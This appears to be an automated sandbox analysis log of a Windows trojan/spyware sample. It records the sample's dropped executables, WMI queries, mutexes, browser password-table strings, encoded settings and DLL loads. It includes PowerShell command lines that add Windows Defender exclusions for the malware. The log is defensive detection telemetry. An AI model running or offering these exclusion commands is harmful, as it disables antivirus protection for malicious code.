Source: YsrQekGS.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: YsrQekGS.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: YsrQekGS.exe.0.dr, Settings.cs | Base64 encoded string: 'OvIq3p/is46tW6jYGf6J298wGKVnNDD+Q2jMC9umDUXxUFGs+v2lXZqpyZYLPXWp', 'pxd6c+vbo7J2E6lUd3a2wKCIlIC2gxvRYuDZ7sQjEHLV31h+0MRraKVVx1LSrTHV'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/57@3/3
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_004064DD GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle | 0_2_004064DD
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_00419925 CoCreateInstance | 0_2_00419925
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | File created: C:\Users\user\AppData\Local\Yandex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Mutant created: \Sessions\1\BaseNamedObjects\BjImkAWMcrtpfpkF
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Command line argument: sfxname | 0_2_0040FCFB
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Command line argument: STARTDLG | 0_2_0040FCFB
Source: Ekpb7jn7mf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tmpC5A4.tmp.2.dr, tmpC593.tmp.2.dr, tmpC582.tmp.2.dr, tmpC572.tmp.2.dr, tmpC594.tmp.2.dr, tmpC5A5.tmp.2.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Ekpb7jn7mf.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | File read: C:\Users\user\Desktop\Ekpb7jn7mf.exe
Source: unknown | Process created: C:\Users\user\Desktop\Ekpb7jn7mf.exe "C:\Users\user\Desktop\Ekpb7jn7mf.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Process created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
Source: unknown | Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: aclayers.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: sfc.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: riched32.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: twinui.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: execmodelproxy.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: mrmcorer.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | Section loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: avicap32.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: msvfw32.dll
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: winmm.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vccorlib140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: concrt140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wintypes.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coremessaging.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47langs.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: iertutil.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dcomp.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.datatransfer.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: ntmarta.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wldp.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rometadata.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.appcore.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositorycore.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windowmanagementapi.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textinputframework.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: inputhost.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coreuicomponents.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: propsys.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coreuicomponents.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uxtheme.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: urlmon.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: srvcli.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: netutils.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxgi.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: resourcepolicyclient.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: mrmcorer.dll
